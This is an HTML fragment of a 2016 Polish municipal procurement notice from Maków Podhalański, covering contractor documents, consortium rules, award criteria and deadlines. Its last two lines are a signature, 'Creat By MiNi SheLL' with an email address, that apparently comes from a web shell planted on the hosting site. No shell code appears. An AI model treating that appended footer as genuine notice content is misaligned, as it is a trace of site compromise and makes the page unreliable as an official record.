<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku korzystania z zasobów innych podmiotów, w celu wykazania spełniania warunków udziału w postępowaniu, zasobów innego podmiotu, Wykonawca zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia zgodnie z treścią art. 26 ust. 2b ustawy Zamawiający żąda: oświadczenia o braku podstaw do wykluczenia aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt. 2 ustawy. W przypadku Wykonawców prowadzących działalność gospodarczą w oparciu o wpis do CEIDG wymagane jest załączenie wydruku z CEIDG. Podmiot który zobowiązał się do udostępnienia zasobów Wykonawcy zgodnie z Art. 26 ust. 2b ustawy Prawo zamówień publicznych (Dz. U. z 2013 r. poz. 907 z późn. zm.) będzie zgodnie z Art. 26 ust. 2e ustawy Prawo zamówień publicznych, odpowiadał solidarnie z Wykonawcą za szkodę Zamawiającego powstałą w skutek nieudostępnienia tych zasobów. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (konsorcjum) zgodnie z art. 23 w związku z art. 141 ustawy Prawo zamówień publicznych Zamawiający żąda: -wszyscy konsorcjanci winni obligatoryjnie dołączyć do oferty dokumenty wymagane od Wykonawców wymienione w rozporządzeniu w pkt 2 ppkt 1-5. -dokumenty wymienione w pkt. 3 ppkt 1 składane mogą być wspólnie i takiej podlegać będą ocenie. -w przypadku wyboru przez Zamawiającego oferty złożonej przez konsorcjum, Wykonawcy tworzący konsorcjum zobowiązani będą, najpóźniej przed dniem podpisania umowy na wykonanie zamówienia, do przedłożenia umowy konsorcjum, -umowa, o której mowa wyżej, winna zawierać w szczególności: oznaczenie stron, cel działania, czas trwania umowy, zasady współdziałania, w tym zakresie prac przewidzianych przez każdą ze stron oraz zasady dokonywania rozliczeń. W przypadku, gdy Wykonawcę reprezentuje pełnomocnik - do oferty musi być załączone pełnomocnictwo określające zakres i podpisane przez osoby reprezentujące osobę prawną lub fizyczną. W przypadku złożenia kserokopii, pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez osoby udzielające pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Serwis - 10</li>
<li>3 - Termin płatności za fakturę - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.makow-podhalanski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zarząd Placówek Oświatowych w Makowie Podhalańskim ul. Szpitalna 3, 34-220 Maków Podhalański - pokój nr 25, piętro II Urzędu Miejskiego w Makowie Podhalańskim..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.07.2016 godzina 09:00, miejsce: Gminny Zarząd Placówek Oświatowych w Makowie Podhalańskim ul. Szpitalna 3, 34-220 Maków Podhalański - pokój nr 25, piętro II Urzędu Miejskiego w Makowie Podhalańskim..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com